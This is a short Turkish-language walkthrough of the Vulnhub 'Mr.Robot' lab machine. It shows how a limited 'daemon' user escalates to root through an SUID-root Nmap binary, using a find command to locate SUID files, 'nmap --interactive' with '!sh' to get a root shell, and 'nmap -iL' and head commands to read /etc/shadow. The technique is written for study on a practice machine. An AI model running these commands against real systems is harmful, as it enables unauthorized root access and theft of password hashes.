Not: Yazıda kullanılan Mr.Robot sanal makinesi Vulnhub sitesinden indirilebilir.
https://www.vulnhub.com/entry/mr-robot-1,151/
Erişim sağlanan kullanıcının (daemon) yetkilerinin sınırlı olduğu görülmektedir.
id
whoami
head -5 /etc/shadow
Mevcut sanal makinedeki Nmap aracının sahibinin “root” olduğu ve SUID bitinin etkin olduğu görülmektedir.
/usr/local/bin/nmap –-version
ls -la /usr/local/bin/nmap
Not: SUID bitinin etkinliği için “find” aracı da kullanılabilir.
find / -user root -perm -4000 -print 2>/dev/null
Nmap aracı interaktif modda çalıştırıldığında işletim sistemi üzerinde kod çalıştırılabilir.
/usr/local/bin/nmap –interactive
h
“!” ile işletim sistemi komutu çalıştırılabilmektedir. UID (User ID) için 1 değeri geldiği görülürken; EUID (Effective User ID) değerinin 0 olduğu görülmektedir.
!id
SUID bitinin etkinleştirilmesi sebebi ile uygulamanın sahibi (root) gibi komut çalıştırılabilmektedir.
!sh
id
whoami
head -5 /etc/shadow
Not: Dosya okuma işlemi de yapılabşilmektedir
nmap -iL /etc/shadow 1.2.3.4
Kaynaklar:
http://resources.infosecinstitute.com/privilege-escalation-linux-live-examples/
https://null-byte.wonderhowto.com/how-to/use-misconfigured-suid-bit-escalate-privileges-get-root-0173929/